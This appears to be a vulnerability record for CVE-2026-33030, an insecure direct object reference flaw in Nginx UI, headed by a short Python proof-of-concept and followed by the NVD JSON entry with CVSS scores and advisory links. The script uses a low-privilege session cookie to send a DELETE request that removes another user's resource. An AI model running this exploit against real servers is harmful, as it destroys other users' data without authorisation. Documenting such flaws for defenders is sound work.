CVE-2026-33030

import requests # Configuration target_url = "http://target-ip:port/api/sites/1" # ID 1 might belong to Admin attacker_session = "valid_low_privilege_cookie" # Headers headers = { "Cookie": f"session={attacker_session}", "Content-Type": "application/json" } # Exploit: Attempt to delete other user's resource # The vulnerability allows any authenticated user to interact with any resource ID response = requests.delete(target_url, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Resource deleted via IDOR.") else: print("[-] Exploit failed or patched.")

{"cve": {"id": "CVE-2026-33030", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:19.243", "lastModified": "2026-04-01T18:21:15.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nginx UI is a web user interface for the Nginx web server. In versions 2.3.3 and prior, Nginx-UI contains an Insecure Direct Object Reference (IDOR) vulnerability that allows any authenticated user to access, modify, and delete resources belonging to other users. The application's base Model struct lacks a user_id field, and all resource endpoints perform queries by ID without verifying user ownership, enabling complete authorization bypass in multi-user environments. At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "Nginx UI es una interfaz de usuario web para el servidor web Nginx. En las versiones 2.3.3 y anteriores, Nginx-UI contiene una vulnerabilidad de Referencia Directa Insegura a Objeto (IDOR) que permite a cualquier usuario autenticado acceder, modificar y eliminar recursos pertenecientes a otros usuarios. La estructura base Model de la aplicación carece de un campo user_id, y todos los puntos finales de recursos realizan consultas por ID sin verificar la propiedad del usuario, lo que permite una omisión completa de la autorización en entornos multiusuario. En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.3.3", "matchCriteriaId": "FD639632-5708-446A-80D7-4A289528D221"}]}]}], "references": [{"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-5hf2-vhj6-gj9m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-5hf2-vhj6-gj9m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}